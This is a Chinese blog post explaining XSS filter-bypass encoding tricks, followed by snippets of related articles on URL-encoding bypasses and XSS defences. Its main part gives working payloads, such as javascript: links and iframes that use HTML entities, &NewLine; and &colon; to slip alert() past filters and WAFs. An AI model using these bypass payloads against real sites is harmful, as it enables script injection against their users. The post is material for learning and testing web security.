XSS编码问题

最新推荐文章于 2022-11-10 16:48:06 发布
最新推荐文章于 2022-11-10 16:48:06 发布
阅读量444 收藏
点赞数
分类专栏: XSS
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/qq_45300786/article/details/118541744
版权

wooyun%26%23x27,alert(1)%2b%26%23x27

解码后’,alert(1)’

由于页面对单引号 & 符号 以及 #符号过滤!但是html中可以识别html实体编码!但是实体编码是由&#组成!

这个时候&#已经被过滤 我们只能通过url编码来对 & # 两个符号进行编码!再让浏览器解码成 &# 然后拼接x27 最后就成为了单引号的html16进制编码!

<a href="j&#x61vascript:%26%23x61;lert(1)">click me</a>


<iframe src="j&#x61vascript:&#x61l\u0065rt(3333)"></iframe>

解码后:我们的提交值为:

alert(1)

HTML 编码十进制和十六进制编码的分号是可以去掉的
html编码;还有,数字编码前面加「0」,这也是一条很好的绕过 WAF 的向量

&colon; => [冒号] 
&NewLine; => [换行] 

<a href="&#x00000000000000000000000000006aavasc&NewLine;ript&colon;alert(1)">click</ a> 


<a href="javasc&NewLine;ript&colon;alert(1)">click</a>

首先html编码被还原出来 然后就成了换行 跟冒号

<a href="javasc
ript:alert(1)">click</a>

为什么换行后还能够执行 是因为浏览器中的解析器中词法分析器 起的作用会跳过空白跟换行之类的无效字符。

然后就构造成了一个完整的语句

<a href="javascript:alert(1)">click</a>

代码执行!

看完那些之后瞬间心里觉得原来跟原理性相关的东西真的很重要!能够让你写 xss payload更加灵活!
跳过空白跟换行之类的无效字符。

=======================

为什么换行后还能够执行 是因为浏览器中的解析器中词法分析器 起的作用会跳过换行之类的无效字符。

<a href="jav&#x0a;asc&NewLine;ript&colon;alert(1)">click</a>

只能解码成一个,才能拼接,
比如 % 解码成 %
不能 %26%23x 解码成 &#x

<a href="j&#x61vascript:%0&#x61;&#x25;61l\u0065rt(3333)">click me</a>

xss的js的16进制编码用不了

参考:

XSS编码问题的个人总结
XSS与字符编码的那些事儿

樱浅沐冰
关注
  • 0
    点赞
  • 0
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
专栏目录
xss编码两次_URL编码XSS
weixin_39719127的博客
12-18 800
0x00 背景最近遇到一个双重编码绕过过滤的xss漏洞,成功在大佬的指点下弹出成功之后记录一下学习。0x01 URL编码一个URL的形式如下:foo://example.com:8042/over/there?name=ferret#nose协议 域名 端口 路径 search参数 hash参数通常来说,如果某种文本需要编码,说明他并不适合传输。原因多种多样,或...
前端url后面的参数编码_【前端安全】| XSS基础篇
weixin_28693309的博客
12-27 732
一、概述XSS(Cross-Site Scripting):跨站脚本攻击是代码注入攻击的一种,将恶意的JavaScript代码注入到前端页面中,用户访问后会执行注入的代码,造成Cookie、账号密码劫持,钓鱼攻击,水坑攻击,CSRF,获取用户隐私信息甚至结合CVE造成命令执行。二、xss分类1、Reflected XSS反射型XSS,非持续性的XSS,用户点击后才能触发,常见于网站的搜...
XSS解决方案系列之四:关于编码
weixin_33749131的博客
06-15 360
本文准备说明以下几个问题: 1. 关于重复编码问题 2. 关于编码的多种形式的问题 3. 关于编码的几个常见问题 【说明】 本文所述编码是指encode,可以理解为转义,而不是编程序写代码。 编码或者转义机制替我们解决两个问题:      a. 避免保留字冲突问题,对于web应用来说,XSS问题也是其中一类     b. 表达不可输入字符问题,比如我想在程序当中表达一个键盘上没有...
URL编码XSS
weixin_30670925的博客
09-13 230
0x00 背景 最近遇到一个双重编码绕过过滤的xss漏洞,成功在大佬的指点下弹出成功之后记录一下学习。 0x01 URL编码 一个URL的形式如下: foo://example.com:8042/over/there?name=ferret#nose协议 域名 端口 路径 search参数 hash参数 通常来说,如果某种文本需要编码,说明他并...
urlcode编码绕过xss限制
weixin_42902697的博客
11-10 637
urlcode编码绕过xss限制
第04篇:XSS三重URL编码绕过实例1
08-03
0x01 漏洞实例某次测试中,遇到一个很奇葩的XSS,我们先来加一个双引号,看看输出:如图,可以看到,双引号被转义了,这时候是不是有种想放弃的想法,抱着尝试的状
xssEncode swf
01-11
xss xssencode 16 10 url js xss xssencode 16 10 url js
Xss字符编码突破过滤方法总结
02-11
详细介绍了主流的9种Xss字符编码突破过滤方法,纯手工,欢迎交流学习。
xss漏洞安全编码系列详解
06-10
结合在csdn上web渗透测试课程(https://edu.csdn.net/course/detail/8064该课程主要讲解攻击过程),讲解xss的攻击原理及漏洞编码,现场带领大家编写补丁代码,真正在代码层面上杜绝该类漏洞的存在。
XSS Encode
03-11
Xsser神器 By:0x_Jin 谢谢0x_Jin分享
XSS-Codec XSS代码转换工具
01-14
XSS代码转换工具,用于XSS代码的转换
xssbypass_【渗透技巧】XSS三重URL编码绕过实例
weixin_30126409的博客
12-23 3916
0x00 前言跨站脚本攻击(Cross Site Scripting),缩写为XSS,恶意攻击者往Web页面里插入恶意Script代码,当用户浏览该页之时,嵌入其中Web里面的Script代码会被执行,从而达到恶意攻击用户的目的。在黑盒渗透中,XSS在很多网站中普遍存在,这边分享一个简单有意思的XSS三重URL编码绕过漏洞实例。0x01 漏洞实例某次测试中,遇到一个很奇葩的XSS,我们先来加一个双...
由于IE对URL编码问题处理不当带来的XSS的PoC
公众号shadow sock7
06-11 1027
参考: https://web.archive.org/web/20131107024350/http://blackfan.ru/SourceRequestURI: <%= request.getRequestURI() %> Host: <%= request.getServerName() %> Port: <%= request.getLocalPort() %>PoC (all ve
复现urlcode编码绕过xss限制的两个案例
weixin_57507186的博客
11-10 1061
复现urlcode编码绕过xss限制两个例子,GET传递的参数直接输出在src中会存在反射型xss漏洞,本次复现的目的是利用url编码规则构造url绕过xss限制。
16进制绕过过滤触发XSS
一米八多的瑞兹的博客
03-18 629
1. 16进制介绍 十六进制转换有16进制每一位上可以是从小到大为0、1、2、3、4、5、6、7、8、9、A、B、C、D、E、F16个大小不同的数,即逢16进1,其中用A,B,C,D,E,F(字母不区分大小写)这六个字母来分别表示10,11,12,13,14,15。 使用python将字符转换为16进制类型。 2. XSS挖掘 构造无害独一字符串,在响应在寻找该字符串。 双斜杠+16进制绕过 Payload触发XSS Payload: \\x3cscript\\x3ealert(documen
XSS编码初析
weixin_30814329的博客
08-04 187
首先我们应当了解,当我们发送一个请求链接时,服务器与客户端都发生了什么 这里仅涉及到js的编码问题,因此就编码来说,首先我们确定我们发出的请求是采用GET的方式还是采用POST的方式 若采用GET的方式,则客户是通过URL地址发送请求链接,既然是URL链接就需要对其进行URL编码,客户端首先对其进行URL编码,之后发送给服务器端,服务器端受到该GET请求后,首先解析请求链接,因此就对URL进行...
xss绕过之编码绕过
m0_63581584的博客
06-03 2399
xss编码绕过 首先我们知道解析顺序,URL解码,HTML解码 ,CSS解码,JS解码 1.在服务端接受到请求后,一般是先进行url解码,然后在提取浏览器中参数。所以一般url编码是不能绕过。 2.如果我们输入了带有HTML实体编码值,只要在保证浏览器接受数据时能构建DOM树,就能进行解码操作。 下面为什么会进行url编码,不是为了绕过而进行的,因为HTML实体编码后(&#x63);会是这种情况。而浏览器在发送到服务端传参也是&进行传参分隔的,所以就会产生问题.我们就要进行url编码 3.我
XSS Payload 学习浏览器解码
xiaooxiangg的博客
07-27 499
.
关于XSS的复合编码
公众号shadow sock7
06-16 1123
参考: http://www.freebuf.com/articles/web/43285.html复合编码所谓复合编码,也就是说输出的内容输出在多个环境中,例如<td onclick=”openUrl(add.do?userName=’<%=value%>’);”>11</td>value的内容首先出现在一个URL中,这个URL在一段javascript中,而javascript代码又是html
xss localStorage
最新发布
08-23
XSS (Cross-Site Scripting) 是一种常见的网络安全漏洞,允许攻击者在受影响的网页上注入恶意脚本。这些脚本可以窃取用户的敏感信息,修改页面内容,甚至执行其他恶意操作。 而 localStorage 是一种 Web 浏览器中的 Web Storage API,用于在浏览器中存储数据。它允许网页在本地存储数据键值对,并且这些数据在同源的网页之间是共享的。然而,由于 XSS 漏洞的存在,攻击者可以注入恶意脚本来访问或篡改 localStorage 中的数据。 为了防止 XSS 攻击,我们应该采取以下措施: 1. 输入验证和过滤:对用户输入进行严格验证和过滤,确保只接收预期的输入,并剔除任何可能的恶意脚本。 2. 输出编码:在将用户输入或从其他来源获取的数据输出到网页上时,使用正确的编码方式进行转义,以防止脚本执行。 3. 使用 Content Security Policy (CSP):通过配置 CSP 来限制网页中可以执行的内容和加载的资源,可以有效减少 XSS 攻击的风险。 4. 定期更新和修复漏洞:及时更新和修复应用程序、框架和库中的漏洞,以防止攻击者利用已知的安全问题。 综上所述,要保护网站免受 XSS 攻击,我们需要综合使用输入验证、输出编码、CSP 和定期漏洞修复等安全措施。

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值